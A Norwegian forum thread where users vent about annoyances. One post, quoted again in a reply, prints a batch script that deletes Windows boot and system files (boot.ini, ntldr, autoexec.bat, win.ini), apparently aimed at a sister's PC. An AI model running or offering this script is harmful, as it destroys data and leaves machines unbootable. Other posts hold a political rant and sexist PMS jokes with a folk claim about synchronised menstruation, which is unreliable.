Gå til innhold

Ting som irriterer så grenseløst v2.0!


Runar

Anbefalte innlegg

Videoannonse
Annonse

Bitchy søster som ikke er takknemlig for at jeg skaffet henne cs5 på pcen hennes. :mad:

 

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

  • Liker 2
Lenke til kommentar

Bitchy søster som ikke er takknemlig for at jeg skaffet henne cs5 på pcen hennes. :mad:

 

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

 

Aner virkelig ikke hva det der er, men det var på mac.

Lenke til kommentar

Irriterer meg over at alle aviser og nyhetssendinger skal på død og liv fortelle meg siste nytt om lederstriden innad i SV. Dette lille minipartiet med oppslutning rett over sperregrensen er en ikke-sak. Statistikken taler jo for seg selv. Der er jo ikke en KJEFT i landet som bryr seg, uten om disse såkalte journalistene som prøver og lage en sak av ingenting.

 

Nei, Lysbakken... hop i havet og bli der.

  • Liker 1
Lenke til kommentar

Jeg bor i huset med 3 damer (mor og to søstre). Det er som om alle 3 alltid har pms konstant. :realmad:

Haha, de går på runde? En uke i måneden du faktisk kanåpne kjeften uten å bli kjefta på?

Aner ikke når de virkelig har, men det føles som om alle tre alltid har det. :tease:

når jenter bor tett på hverandre hender det ofte at de får mensen og pms og sånt shit samtidig.

Endret av The Barnacle
Lenke til kommentar

Jeg bor i huset med 3 damer (mor og to søstre). Det er som om alle 3 alltid har pms konstant. :realmad:

Haha, de går på runde? En uke i måneden du faktisk kanåpne kjeften uten å bli kjefta på?

Aner ikke når de virkelig har, men det føles som om alle tre alltid har det. :tease:

når jenter bor tett på hverandre hender det ofte at de får mensen og pms og sånt shit samtidig.

 

Det er ett rent helvete, men siden jeg kjøpte tv for å ha i rommet har jeg sluppet å omgås så mye med dem :D

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
×
×
  • Opprett ny...